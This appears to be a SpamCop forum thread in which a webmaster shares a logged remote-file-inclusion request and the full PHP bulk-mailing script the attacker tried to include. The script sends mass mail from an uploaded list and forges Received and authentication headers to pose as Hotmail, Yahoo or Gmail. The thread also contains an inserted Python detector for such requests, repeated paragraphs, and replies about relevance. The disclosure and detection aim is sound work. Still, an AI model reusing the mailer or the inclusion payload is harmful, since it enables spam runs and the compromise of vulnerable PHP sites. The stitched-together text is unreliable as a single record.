T-Qualizer.com

Server side reporting tool for hacking attempts in realtime

8 posts in this topic

On my websites, I'm running a small detection tool for php-code injections. It automatically downloads the file the hacker tries to include.

Below I show you a real example from my log files and the downloaded spammer tool. This stuff makes clear where the increased spam runs of recent times come from.

My suggestion is to offer my detection tool as an open-source project and expand it to a realtime reporting tool that's able to report these attempts straight to SpamCop. Of course this also requires a SpamCop-side tool to receive them. As an open-source project it may be expanded to a complete honeypot to detect and eliminate spam runs before they have done their job.

Here is an example of a nice hacker spam action, which really happened and was logged on my website. Nothing is faked or changed.

Requested URL on 2009-12-29 at 21:56 GMT, from IP [82.155.84.123] (bl6-84-123.dsl.telepac.pt):

www.t-qualizer.eu/index.php?sessid=y1ufj9funveq5dw50l&lang=en&page=http://www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt?

You can see that the hacker tried to include a URL in the hope that it will be executed.

Here comes the script, downloaded by my detection tool from:

www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt?

At the time I'm writing this post, 11 days later, it's still online!

<html>
<head>
<title>35437282898562626475892888</title>
<style type="text/css">
<!--
.cxtexto {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	border: thin #000000;
	background-color: #FFFFFF;
	color: #000000;
}
-->
</style>
</head>
</div>
		<table width="516" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC" id="table1">
		  <form name="form1" method="post" action="" enctype="multipart/form-data">
		  <input name="teste" type="hidden" class="cxtexto" id="teste" value="yep" size="3" maxlength="3">
			<tr>
				<td colspan="4" valign="top">  </td>
				</tr>
			<tr>
				<td valign="top"> <div align="right">
					<font size="1" face="Verdana, Arial, Helvetica, sans-serif">
					<strong>nome</strong></font></div></td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="NRemetente" type="text" class="cxtexto" id="NRemetente" value="<?php echo stripslashes($_POST['NRemetente']);?>" size="33" maxlength="60"></td>
			<td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
				email</font></strong></div></td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="ERemetente" type="text" class="cxtexto" id="ERemetente" value="<?php echo stripslashes($_POST['ERemetente']);?>" size="39" maxlength="60"></td>
				</tr>
			<tr>
				<td valign="top" colspan="4" height="2"></td>
				</tr>
			<tr>
				<td valign="top"> <div align="right"><strong>
					<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
					assunto</font></strong></div>
				</td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="Assunto" type="text" class="cxtexto" id="Assunto" value="<?php echo stripslashes($_POST['Assunto']);?>" size="33" maxlength="60"></td>
			<td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
				lista</font></strong></div></td>
			<td valign="middle" bgcolor="#CCCCCC" class="cxprocura">   <input name="emails" type="file" class="cxtexto" id="emails"></td>
				</tr>
			<tr>
				<td colspan="4" valign="top" height="2"></td>
				</tr>
			<tr>
				<td colspan="2" valign="top"> <div align="center">
				<strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">i</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>ntervalo 
				</strong></font>
				<input name="Interval" type="text" class="cxtexto" id="interval" value="0" size="3" maxlength="3">
				<font size="1" face="Verdana, Arial, Helvetica, sans-serif">
				<strong>segundos</strong></font></div></td>
			<td colspan="2" valign="middle" bgcolor="#CCCCCC">  
		  <p align="center">  
		  <input type="submit" name="Submit2" value="enviar">  
		  <input name="Submit" type="button" onClick='window.close()' value="desistir"></td>
				</tr>
			<tr>
				<td colspan="4" valign="top"> 
				<p align="center"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">conteudo</font></strong></td>
			</tr>
			<tr>
				<td colspan="4" align="center">
				<p align="center"> 
				<textarea name="Conteudo" cols="92" rows="24" wrap="VIRTUAL" class="cxtexto" id="Conteudo"><?php echo stripslashes($_POST['Conteudo']);?></textarea></td>
			</tr>
			<tr>
				<td colspan="4" valign="top">
				 </td>
			</tr>
			 </form>
		</table>
<?php //Source PHP

//Para melhor 'debuging'
//error_reporting(E_ALL);
[at]ignore_user_abort(TRUE);
error_reporting(0);
[at]set_time_limit(0);
ini_set("memory_limit", "-1");

//Verifica se os dados foram preenchidos
$teste = $_POST['teste'];
If ($teste == null) {
	exit(/*"<br><center><b>Preencha corretamente os campos</b></center>"*/);
}

//Recupera os dados do FORM
$FromName = $_POST['NRemetente'];
$FromMail = $_POST['ERemetente'];
$Subject = $_POST['Assunto'];
$MailServer = explode("[at]",$FromMail,2); $MailServer = $MailServer['1'];
$arq_name = $_FILES["emails"]["name"];
$arq_temp = $_FILES["emails"]["tmp_name"];
$Lista = (file($arq_temp));
$QtdMail = count($Lista);
$Conteudo = stripslashes($_POST['Conteudo']);
$IntervalX = $_POST['Interval'];
$ip = gethostbyname($MailServer);

//Arquivos de configuracao
[at]ini_set("sendmail_from", $FromMail);
[at]ini_set("time_limit",0);


//Define os headers do email
//	$headers  = "From: $FromName <$FromMail>\n";
//	$headers .= "MIME-Version: 1.0\n";
//	$headers .= "Content-type: text/html; charset=iso-8859-1\n";
//	$headers .= "Content-Transfer-encoding: 8bit\n";
//	$headers .= "Reply-To: $FromName <$FromMail>\n";
//	$headers .= "Return-Path: $FromMail\n";
//	$headers .= "Message-ID: <".md5(uniqid(time()))."[at]$MailServer>\n";
//	$headers .= "X-Priority: 3\n";
//	$headers .= "X-MSmail-Priority: High\n";
//	$headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n";
//	$headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n";
//	$headers .= "X-Mailer: iGMail [www.ig.com.br]\n";
//	$headers .= "X-Originating-Email: [$FromName]\n";
//	$headers .= "X-Sender: $FromName\n";
//	$headers .= "X-Originating-IP: [201.201.120.121]\n";
//	$headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\n";


//Inicia o envio
If ($QtdMail <= 1) {
	exit;
} else {
	echo str_repeat("-", 126)."<br>";
	echo "<b>De:</b> $FromName <$FromMail><br>";
	echo "<b>Assunto:</b> $Subject<br>";
	echo "<b>Para Lista:</b> $arq_name ($arq_temp) <b>contendo</b> $QtdMail <b>e-mails</b><br>";
	echo "<b>Com intervalo de:</b> $IntervalX <b>segundos</b><br>";
	echo str_repeat("-", 126)."<br>";
}

$error = 0;
$donen = 0;

while (list($pos, $val) = each($Lista)) {
	$val = trim($val);


	if (strstr(strtolower(htmlentities($val)), 'yahoo') == ''  &&   strstr(strtolower(htmlentities($val)), 'hotmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'live') == '')
	  {
		 //echo "\r\n ENTRA GMAIL \r\n";
		 $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com');
		 $ip2 = gethostbyname('mta269.mail.re4.yahoo.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mta269.mail.re4.yahoo.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mta269.mail.re4.yahoo.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }
	elseif (strstr(strtolower(htmlentities($val)), 'gmail') == ''  &&   strstr(strtolower(htmlentities($val)), 'hotmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'live') == '')
	  {
		 //echo "\r\n ENTRA YAHOO \r\n";
		 $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com');
		 $ip2 = gethostbyname('mail-fx0-f217.google.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mail-fx0-f217.google.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }
	elseif (strstr(strtolower(htmlentities($val)), 'gmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'yahoo') == '')
	  {
		 //echo "\r\n ENTRA HOTMAIL \r\n";
		 $ip1 = gethostbyname('mta269.mail.re4.yahoo.com');
		 $ip2 = gethostbyname('mail-fx0-f217.google.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mail-fx0-f217.google.com from=yahoo.com; domainkeys=neutral (no sig); from=yahoo.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO mta269.mail.re4.yahoo.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by mta269.mail.re4.yahoo.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }

	if (mail($val, $Subject, $Conteudo, $headers)) {
			$donen++;
			echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">';
	} else {
			$error++;
			echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">';
	}

	$headers = "";

	echo htmlentities($val).' [ok='.$donen.' error='.$error.' total='.($pos+1).'/'.$QtdMail.']</font><br>';
	sleep($IntervalX);
}

unlink($arq_temp);

?>

</body>
</html>

If SpamCop and webmasters are interested in a detection and realtime reporting tool, then let me hear it and I will post my script as an open-source project.
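A detector for the request pattern shown in the first post (a `page=http://...` parameter pointing at a remote file), added here as an example in Python; it is not the poster's tool, whose code is not shown in the thread. It scans constructed Apache-style log lines for query parameters carrying a remote URL and emits one report record per hit, which is the input a realtime reporting tool would need. The log lines, the log regex and the `watched_params` knob are assumptions; only the first line reuses the request, IP and host from the post.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines (not from the original post).
# Line 1 reproduces the request the post shows; lines 2 and 3 are benign traffic.
SAMPLE_LOG = """\
82.155.84.123 - - [29/Dec/2009:21:56:03 +0000] "GET /index.php?sessid=y1ufj9funveq5dw50l&lang=en&page=http://www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.5 - - [29/Dec/2009:21:57:10 +0000] "GET /index.php?sessid=abc&lang=en&page=home HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.6 - - [29/Dec/2009:21:58:44 +0000] "GET /index.php?page=contact&ref=https://example.org/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Assumed log layout: client IP, identd, user, [timestamp], "METHOD target PROTO" ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# A parameter value that is itself an absolute remote URL is what a vulnerable include() would fetch.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


@dataclass
class RfiHit:
    """One reportable event: who sent it, when, which parameter, and where it points."""
    ip: str
    timestamp: str
    param: str
    remote_url: str
    remote_host: str


def scan_line(line, watched_params=None):
    """Return an RfiHit for every query parameter of this request that carries a remote URL.

    watched_params (assumed knob) restricts the check to include-style parameters such as
    {"page"}, so legitimate URL-valued fields like a referrer are not flagged.
    """
    m = LOG_RE.match(line)
    if not m:
        return []                       # not a request line we understand
    query = urlsplit(m.group("target")).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if watched_params and name not in watched_params:
            continue
        if REMOTE_URL_RE.match(value):
            host = urlsplit(value).hostname or ""   # host serving the payload, for the report
            hits.append(RfiHit(m.group("ip"), m.group("ts"), name, value, host))
    return hits


def scan_log(text, watched_params=None):
    return [hit for line in text.splitlines() if line.strip()
            for hit in scan_line(line, watched_params)]


def report_lines(hits):
    """Plain-text report records, one per hit, ready to hand to an abuse-report tool."""
    return [f"{h.timestamp} {h.ip} param={h.param} host={h.remote_host} url={h.remote_url}"
            for h in hits]


if __name__ == "__main__":
    for record in report_lines(scan_log(SAMPLE_LOG, watched_params={"page"})):
        print(record)
```

Without `watched_params` the referrer on the third constructed line is flagged too, which is the false-positive class a webmaster tunes out before wiring the output to automatic abuse reports.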

My suggestion is to offer my detection tool as an open-source project and expand it to a realtime reporting tool that's able to report these attempts straight to SpamCop. Of course this also requires a SpamCop-side tool to receive them. As an open-source project it may be expanded to a complete honeypot to detect and eliminate spam runs before they have done their job.

I do not see any connection to the core of the SpamCop mission and tool-set. Hacking of a web-site is nowhere near the "sending spam e-mail" action. Moving this from the "New Feature Request" Forum section to the "Geek/Tech Things" Forum section with this Post.

At the time I'm writing this post, 11 days later, it's still online!

Does one assume that you have this nifty detection tool, you've done this analysis and data capture, but didn't report/complain about the actions and files involved to anyone? This would also force one to ask why you Posted it all here in the first place, never mind that it has no relationship to what the SpamCop Parsing & Reporting system is all about ...???? Yes, I see that there is code there to try to send e-mail, but .... this would only happen after the successful attack/exploit.

As your suggested exploit is geared towards Joomla (well, actually, what appears to be an exploited Joomla (using) site), I'd suggest you (and/or the site-owner) hit places such as http://secunia.com/advisories/product/ and check out the published advisories/warnings about exploit issues with that tool (I'd have offered up a more direct link, but the Joomla+other looks pretty extensive. Not in use here, so no idea which of those 'extensions' would be of interest in your case.)

On the other hand, are the redirects on "your" site to mijndomein.nl some sort of indication that either your site has been hacked, or that there's simply some spamvertising involved here?

On my websites, I'm running a small detection tool for php-code injections. It automatically downloads the file the hacker tries to include.

That looks very interesting, and I'd love to see the code. Could you mail me at deputies[at]spamcop.net, please? We would love to do more with malware detection.


http://dnsbl.abuse.ch/

It is a nice list of website-attacking IPs - the list does not have all currently active web hacking IPs - but it is a very nice list to augment an htaccess file once an hour (or use via DNS lookups in real time from an Apache module etc).

It seems similar to what you propose, T-Qualizer, but perhaps not as open as you indicate your proposed system would be.

What language is your coding in?

If SpamCop and webmasters are interested in a detection and realtime reporting tool, then let me hear it and I will post my script as an open-source project.

Looks like SpamCop Admin is interested

http://forum.spamcop.net/forums/index.php?...ost&p=73722

The main strength in SpamCop is that it Automatically sends an "abuse" report to the listed owner of the IP

If you could do this also it would remove a lot of the trouble Bots cause

A very high percentage of ISPs do act responsibly to abuse reports and look into it.

Looks like SpamCop Admin is interested

That is not "SpamCop Admin" .... I'd like to believe that the interest posted about was more 'personal' in nature, the Group icon being a bit of a distraction. However, I can't actually speak for her, and she basically doesn't talk to me.


It is always personal/an insult when someone tries to hijack your resources/services?

Edited by QuantumMechanic


All kind of academic. If I read correctly, the person started this thread and then disappeared.

Seems odd, put their work in the public domain, ask for interest/input. When there was some, poof.
